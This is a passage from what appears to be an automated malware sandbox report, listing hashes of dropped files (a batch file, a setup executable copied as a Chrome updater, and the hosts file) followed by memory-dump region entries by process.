                                                                  f580e0e80cc87b25e38ea2c0c8059d04

                                                                  SHA1

                                                                  299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                                  SHA256

                                                                  9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                                  SHA512

                                                                  5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                                                • C:\Windows\Temp\run.bat
                                                                  Filesize

                                                                  98B

                                                                  MD5

                                                                  731afe244b2414169a5f630d52646e56

                                                                  SHA1

                                                                  e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                                  SHA256

                                                                  6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                                  SHA512

                                                                  84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                                                • C:\Windows\Temp\setup.exe
                                                                  Filesize

                                                                  7.1MB

                                                                  MD5

                                                                  e5373f1e2c782659695c5cea587fddea

                                                                  SHA1

                                                                  4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                                  SHA256

                                                                  c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                                  SHA512

                                                                  2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                                                • C:\Windows\Temp\setup.exe
                                                                  Filesize

                                                                  7.1MB

                                                                  MD5

                                                                  e5373f1e2c782659695c5cea587fddea

                                                                  SHA1

                                                                  4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                                  SHA256

                                                                  c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                                  SHA512

                                                                  2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                                                • C:\Windows\system32\drivers\etc\hosts
                                                                  Filesize

                                                                  1KB

                                                                  MD5

                                                                  f3f6968a4c0f457f427eb17f7cc5f68b

                                                                  SHA1

                                                                  872933578f4b7d555158189ed02015f192daa7c6

                                                                  SHA256

                                                                  774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c

                                                                  SHA512

                                                                  5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

                                                                • \Program Files\Chrome\updater.exe
                                                                  Filesize

                                                                  7.1MB

                                                                  MD5

                                                                  e5373f1e2c782659695c5cea587fddea

                                                                  SHA1

                                                                  4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                                  SHA256

                                                                  c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                                  SHA512

                                                                  2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                                                • \Windows\Temp\setup.exe
                                                                  Filesize

                                                                  7.1MB

                                                                  MD5

                                                                  e5373f1e2c782659695c5cea587fddea

                                                                  SHA1

                                                                  4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                                  SHA256

                                                                  c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                                  SHA512

                                                                  2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                                                • memory/384-54-0x00000000763E1000-0x00000000763E3000-memory.dmp
                                                                  Filesize

                                                                  8KB

                                                                • memory/468-142-0x0000000000000000-mapping.dmp
                                                                • memory/580-91-0x0000000000000000-mapping.dmp
                                                                • memory/764-103-0x0000000000000000-mapping.dmp
                                                                • memory/764-109-0x0000000000000000-mapping.dmp
                                                                • memory/768-102-0x0000000000000000-mapping.dmp
                                                                • memory/768-94-0x0000000000000000-mapping.dmp
                                                                • memory/836-117-0x0000000001220000-0x0000000001E79000-memory.dmp
                                                                  Filesize

                                                                  12.3MB

                                                                • memory/836-108-0x0000000000000000-mapping.dmp
                                                                • memory/836-149-0x0000000001220000-0x0000000001E79000-memory.dmp
                                                                  Filesize

                                                                  12.3MB

                                                                • memory/900-100-0x0000000000000000-mapping.dmp
                                                                • memory/904-135-0x0000000000000000-mapping.dmp
                                                                • memory/964-176-0x0000000000A50000-0x0000000000A56000-memory.dmp
                                                                  Filesize

                                                                  24KB

                                                                • memory/964-178-0x0000000000060000-0x0000000000067000-memory.dmp
                                                                  Filesize

                                                                  28KB

                                                                • memory/976-131-0x0000000000000000-mapping.dmp
                                                                • memory/1036-71-0x0000000000000000-mapping.dmp
                                                                • memory/1036-98-0x0000000000000000-mapping.dmp
                                                                • memory/1084-137-0x0000000000620000-0x0000000000626000-memory.dmp
                                                                  Filesize

                                                                  24KB

                                                                • memory/1108-111-0x0000000000000000-mapping.dmp
                                                                • memory/1108-87-0x0000000000000000-mapping.dmp
                                                                • memory/1124-120-0x0000000000400000-0x0000000001059000-memory.dmp
                                                                  Filesize

                                                                  12.3MB

                                                                • memory/1124-121-0x00000000775D0000-0x0000000077779000-memory.dmp
                                                                  Filesize

                                                                  1.7MB

                                                                • memory/1124-116-0x0000000000400000-0x0000000001059000-memory.dmp
                                                                  Filesize

                                                                  12.3MB

                                                                • memory/1124-114-0x0000000000000000-mapping.dmp
                                                                • memory/1124-119-0x00000000775D0000-0x0000000077779000-memory.dmp
                                                                  Filesize

                                                                  1.7MB

                                                                • memory/1124-79-0x0000000000000000-mapping.dmp
                                                                • memory/1124-118-0x0000000000400000-0x0000000001059000-memory.dmp
                                                                  Filesize

                                                                  12.3MB

                                                                • memory/1124-132-0x0000000000000000-mapping.dmp
                                                                • memory/1160-130-0x00000000011FB000-0x000000000121A000-memory.dmp
                                                                  Filesize

                                                                  124KB

                                                                • memory/1160-129-0x00000000011F4000-0x00000000011F7000-memory.dmp
                                                                  Filesize

                                                                  12KB

                                                                • memory/1160-124-0x0000000000000000-mapping.dmp
                                                                • memory/1160-126-0x000007FEED8B0000-0x000007FEEE2D3000-memory.dmp
                                                                  Filesize

                                                                  10.1MB

                                                                • memory/1160-127-0x000007FEECD50000-0x000007FEED8AD000-memory.dmp
                                                                  Filesize

                                                                  11.4MB

                                                                • memory/1160-128-0x00000000011F4000-0x00000000011F7000-memory.dmp
                                                                  Filesize

                                                                  12KB

                                                                • memory/1228-92-0x0000000000000000-mapping.dmp
                                                                • memory/1228-86-0x0000000000000000-mapping.dmp
                                                                • memory/1420-96-0x0000000000000000-mapping.dmp
                                                                • memory/1484-84-0x0000000000000000-mapping.dmp
                                                                • memory/1484-88-0x0000000000000000-mapping.dmp
                                                                • memory/1568-136-0x0000000000000000-mapping.dmp
                                                                • memory/1580-58-0x0000000000000000-mapping.dmp
                                                                • memory/1592-81-0x0000000000000000-mapping.dmp
                                                                • memory/1600-101-0x0000000000000000-mapping.dmp
                                                                • memory/1600-112-0x0000000000000000-mapping.dmp
                                                                • memory/1600-107-0x0000000000000000-mapping.dmp
                                                                • memory/1604-70-0x000007FEFBE51000-0x000007FEFBE53000-memory.dmp
                                                                  Filesize

                                                                  8KB

                                                                • memory/1604-69-0x0000000000110000-0x000000000052C000-memory.dmp
                                                                  Filesize

                                                                  4.1MB

                                                                • memory/1604-68-0x000000001B950000-0x000000001BD6C000-memory.dmp
                                                                  Filesize

                                                                  4.1MB

                                                                • memory/1604-123-0x0000000000000000-mapping.dmp
                                                                • memory/1672-95-0x0000000000000000-mapping.dmp
                                                                • memory/1672-134-0x0000000000000000-mapping.dmp
                                                                • memory/1684-163-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-157-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-182-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-174-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-173-0x0000000000220000-0x0000000000240000-memory.dmp
                                                                  Filesize

                                                                  128KB

                                                                • memory/1684-172-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-150-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-170-0x000000014036DB84-mapping.dmp
                                                                • memory/1684-169-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-167-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-166-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-165-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-161-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-93-0x0000000000000000-mapping.dmp
                                                                • memory/1684-160-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-159-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-97-0x0000000000000000-mapping.dmp
                                                                • memory/1684-151-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-155-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1684-153-0x0000000140000000-0x0000000140803000-memory.dmp
                                                                  Filesize

                                                                  8.0MB

                                                                • memory/1692-80-0x0000000000000000-mapping.dmp
                                                                • memory/1784-104-0x0000000000000000-mapping.dmp
                                                                • memory/1784-82-0x0000000000000000-mapping.dmp
                                                                • memory/1808-148-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                  Filesize

                                                                  48KB

                                                                • memory/1808-145-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                  Filesize

                                                                  48KB

                                                                • memory/1808-175-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                  Filesize

                                                                  48KB

                                                                • memory/1808-144-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                  Filesize

                                                                  48KB

                                                                • memory/1808-146-0x0000000000401BEA-mapping.dmp
                                                                • memory/1808-138-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                  Filesize

                                                                  48KB

                                                                • memory/1808-139-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                  Filesize

                                                                  48KB

                                                                • memory/1808-140-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                  Filesize

                                                                  48KB

                                                                • memory/1808-143-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                  Filesize

                                                                  48KB

                                                                • memory/1868-75-0x000007FEED6F0000-0x000007FEEE24D000-memory.dmp
                                                                  Filesize

                                                                  11.4MB

                                                                • memory/1868-83-0x0000000000000000-mapping.dmp
                                                                • memory/1868-59-0x0000000000000000-mapping.dmp
                                                                • memory/1868-105-0x0000000000000000-mapping.dmp
                                                                • memory/1868-72-0x0000000000000000-mapping.dmp
                                                                • memory/1868-74-0x000007FEEE250000-0x000007FEEEC73000-memory.dmp
                                                                  Filesize

                                                                  10.1MB

                                                                • memory/1868-78-0x0000000001EEB000-0x0000000001F0A000-memory.dmp
                                                                  Filesize

                                                                  124KB

                                                                • memory/1868-76-0x000000001B720000-0x000000001BA1F000-memory.dmp
                                                                  Filesize

                                                                  3.0MB

                                                                • memory/1868-77-0x0000000001EE4000-0x0000000001EE7000-memory.dmp
                                                                  Filesize

                                                                  12KB

                                                                • memory/1868-90-0x0000000000000000-mapping.dmp
                                                                • memory/1940-66-0x0000000000400000-0x0000000001059000-memory.dmp
                                                                  Filesize

                                                                  12.3MB

                                                                • memory/1940-65-0x00000000775D0000-0x0000000077779000-memory.dmp
                                                                  Filesize

                                                                  1.7MB

                                                                • memory/1940-64-0x0000000000400000-0x0000000001059000-memory.dmp
                                                                  Filesize

                                                                  12.3MB

                                                                • memory/1940-56-0x0000000000000000-mapping.dmp
                                                                • memory/1940-63-0x0000000000400000-0x0000000001059000-memory.dmp
                                                                  Filesize

                                                                  12.3MB

                                                                • memory/1940-67-0x00000000775D0000-0x0000000077779000-memory.dmp
                                                                  Filesize

                                                                  1.7MB

                                                                • memory/1944-85-0x0000000000000000-mapping.dmp
                                                                • memory/1944-89-0x0000000000000000-mapping.dmp
                                                                • memory/1976-99-0x0000000000000000-mapping.dmp
                                                                • memory/1976-106-0x0000000000000000-mapping.dmp